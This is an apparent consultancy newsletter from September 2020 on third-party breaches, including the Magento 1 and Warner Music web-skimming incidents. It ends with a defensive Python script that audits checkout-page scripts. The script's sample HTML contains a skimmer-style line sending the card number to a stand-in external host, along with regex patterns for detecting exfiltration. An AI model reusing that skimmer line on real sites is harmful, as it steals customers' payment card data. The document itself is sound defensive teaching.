Third Party Risk Management - Consultancy, Assessment & Advisory

Third Party Risk Insights Sept 2020

This Month's Key Third Party Risk Management Articles & Reports

Hundreds of data security risks on Marriott, British Airways and easyJet websites exposed by Which?

A Which? investigation has exposed hundreds of security vulnerabilities on the websites of major airlines, tour operators and hotel chains. When cyber security experts checked the security of 98 travel firms, they found that Marriott, British Airways and easyJet were among the five companies with the most risks identified.

Experts found 497 vulnerabilities on Marriott-owned websites alone. More than 100 of these were assessed as ‘critical’ or ‘high’. Read more…

Gartner Names ProcessUnity a Leader in the 2020 Gartner Magic Quadrant for IT Vendor Risk Management Tools

Congratulations to our technology partner ProcessUnity on receiving two accolades from Gartner.

Gartner has named ProcessUnity a Leader in the 2020 Gartner Magic Quadrant for the second consecutive year AND gave them the highest score for a use case in the 2020 Gartner Critical Capabilities for IT Vendor Risk Management Tools. Learn more and download the report.

Shared Assessments releases the 2021 TPRM & Data Privacy Toolkit.

The 2021 TPRM Toolkit is an essential part of the Shared Assessments Third Party Risk Management framework, which helps organisations manage the full lifecycle of a third party relationship. The 2021 Toolkit was built to standardise the quality of assessment content and to make assessments easier to create, customise and manage.

Learn about the 2021 Toolkit and key updates.

You’re Only As Strong As Your Weakest Link

Third-Party breaches & Cyber Supply Chain issues that caught our eye

Learning lessons in enhancing IAM from the Shopify breach

Shopify’s announcement that two employees inappropriately accessed transactional data from 200 of the merchants that use its e-commerce platform demonstrates the importance of taking a “zero trust” approach to security and improving identity and access management capabilities, security experts say. Click to read the full article.

E-commerce sites using Magento

Around 2,000 e-commerce stores running Magento were compromised in August, exposing the details of thousands of customers. All of these stores were running an older version of Adobe’s Magento software, Magento 1, for which Adobe ended support on June 30, 2020. Magento is an open-source e-commerce platform written in PHP, which Adobe acquired in 2018. According to Sansec research, about 95,000 e-commerce sites still rely on the older version.

This was by far the largest-scale campaign against e-commerce sites seen since 2015. At one store alone, tens of thousands of customers had their payment information compromised.

On a hacking forum, the user z3r0day offered a Magento 1 “remote code execution” exploit for sale at $5,000, with a video tutorial. Reportedly, no existing Magento admin account is required. The user added “Magento 1 is end-of-life – no patches will be provided by Adobe to fix this bug,” which leaves every remaining Magento 1 store exposed.

Adobe has urged customers to upgrade to the newer platform, Magento 2, and has confirmed that no further patches will be issued for Magento 1.

Warner Music Group

Around the same time, Warner Music Group also issued a data breach warning. The warning followed a sustained web skimming attack on a number of its e-commerce websites.

The web skimming attack was discovered by Warner’s security team in early August. The team believed the breach window ran from April 25 to August 5, 2020.

Personal data compromised in the attack includes names, email addresses, credit card numbers, card expiration dates and CVC/CVV codes. A data breach notice sent by Warner to the affected customers states that “any personal information” customers entered into the affected websites “after placing an item in your shopping cart was potentially acquired by the unauthorized third party.”

It is not clear whether the exploit z3r0day offered was used in the Warner attack.
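Both the Magento and Warner incidents are web skimming: JavaScript ends up on the checkout page, reads the card fields the customer types in and sends them to a domain the store never approved. A practical third-party control is an allowlist of script origins for the payment page, checked against the live HTML on a schedule. The script below is an added example written for this newsletter; it is not code from Sansec, Adobe, Warner or Magento. The store host, the allowlist entries and the sample checkout HTML are all constructed for illustration.

```python
"""Inventory the scripts on a checkout page and flag the ones a skimmer could hide in.

Added example, not code from the newsletter or from any of the companies it
mentions. The allowlist, the page host and SAMPLE_CHECKOUT_HTML are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: the only origins this store has approved to serve
# JavaScript on its checkout page (first-party, its CDN and its payment provider).
ALLOWED_SCRIPT_ORIGINS = {
    "shop.example",
    "cdn.shop.example",
    "js.payment-gateway.example",
}

# Field names a skimmer has to read, and the calls it typically uses to exfiltrate.
PAYMENT_FIELD_RE = re.compile(r"cc_number|card_number|cvv|cvc|exp(iry|_month|_year)", re.I)
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script src> and the body of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def script_origin(src, page_host):
    """Host a script src loads from; relative paths are first-party, //host is not."""
    parsed = urlparse(src)
    if not parsed.netloc:
        return page_host.lower()
    return parsed.netloc.lower()


def audit_checkout_html(html, page_host, allowed=ALLOWED_SCRIPT_ORIGINS):
    """Return script origins outside the allowlist and inline scripts that both
    touch payment fields and make a network call."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = {"unexpected_origins": [], "suspicious_inline": []}
    for src in collector.external:
        origin = script_origin(src, page_host)
        if origin not in allowed:
            findings["unexpected_origins"].append((origin, src))
    for body in collector.inline:
        if PAYMENT_FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings["suspicious_inline"].append(body.strip()[:80])
    return findings


# Constructed checkout page: one legitimate CDN script, one approved payment
# provider script, one unapproved origin and one inline skimmer-style handler.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://js.payment-gateway.example/v1/client.js"></script>
<script src="//static-cdn-analytics.example/track.js"></script>
<script>
  document.querySelector('#cc_number').addEventListener('change', function (e) {
    new Image().src = 'https://static-cdn-analytics.example/p?' + btoa(e.target.value);
  });
</script>
<script>console.log('benign inline script');</script>
</head><body>checkout form goes here</body></html>
"""

if __name__ == "__main__":
    for kind, items in audit_checkout_html(SAMPLE_CHECKOUT_HTML, "shop.example").items():
        for item in items:
            print(f"{kind}: {item}")
```

Run it against the live checkout page on a schedule and alert on any new origin or any new inline script, rather than only on the patterns above: a skimmer can just as easily be appended to a first-party file on a compromised server, as happened with the Magento 1 stores, and that would pass an origin allowlist. Pairing the check with a Content-Security-Policy `script-src` directive and Subresource Integrity hashes on the approved scripts turns the inventory into an enforced control instead of a report.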

Learn more about how DVV Solutions third party risk managed services can help you achieve operational resilience and enhance oversight of your cyber supply chain.

Call today 0161 476 8700

or Submit a Contact Form